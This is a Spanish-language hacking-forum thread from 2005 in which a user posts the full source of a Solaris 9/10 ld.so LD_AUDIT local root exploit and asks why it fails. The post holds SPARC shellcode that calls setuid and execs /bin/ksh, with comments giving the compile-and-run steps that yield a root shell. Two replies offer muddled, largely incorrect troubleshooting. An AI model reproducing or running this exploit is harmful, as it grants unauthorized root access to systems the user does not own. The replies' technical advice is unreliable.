elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 17:40  


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Solaris 9/10 ld.so local root exploit no me rula ??		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Solaris 9/10 ld.so local root exploit no me rula ??  (Leído 777 veces)
Override

Desconectado Desconectado

Mensajes: 242



Ver Perfil WWW
Solaris 9/10 ld.so local root exploit no me rula ??
« en: 1 Agosto 2005, 03:13 »
Código:
$ cat dupa.c
*/

char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

int la_version() {
       void (*f)();
       f = (void*)sh;
       f();
       return 3;
}

/*
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)*/

he compilado este exploit y he seguido las indicaciones de los comentarios perooooo

despues de hacer
Código:
export LD_AUDIT=/tmp/dupa.so
ejecuto el ping
y me sale esto:
ld.so.1: ping: warning: libgcc_s.so.1: open failed: No such file or directory
ld.so.1: ping: warning: /tmp/dupa.so: audit initialization failure: disabled


por qué? hace falta esa libreria?? y por que disabled?? quiere decir que aunque estuviera esa lib el exploit no funcionaria?? :S aún así sigo como usuario normal :'(
En línea
Override

Desconectado Desconectado

Mensajes: 242



Ver Perfil WWW
Re: Solaris 9/10 ld.so local root exploit no me rula ??
« Respuesta #1 en: 1 Agosto 2005, 03:52 »
no entiendo!! el maldito archivo existe :
declare -x LD_LIBRARY_PATH="/usr/local/lib:/usr/local/ssl/lib"

ls /usr/local/lib

libg2c.a
libg2c.la
libg2c.so
libg2c.so.0
libg2c.so.0.0.0
libgcc_s.so
libgcc_s.so.1

ahh! alguien ayudeme :(
En línea
0xC

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Solaris 9/10 ld.so local root exploit no me rula ??
« Respuesta #2 en: 4 Agosto 2005, 22:08 »
¬¬ como piensas que va a rular
si hay una $ antes del gcc ¬¬
En línea
0xC

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Solaris 9/10 ld.so local root exploit no me rula ??
« Respuesta #3 en: 4 Agosto 2005, 22:10 »
Aparte de que no tienes librerias?

debes de tener las librerias para que el exploit jale
por lo regular necesitas el stdio.h
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Root Exploit 2.6.32 -42.1
Nivel Web 		BackBone 0 1,383 Último mensaje 17 Julio 2011, 02:52
por BackBone
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines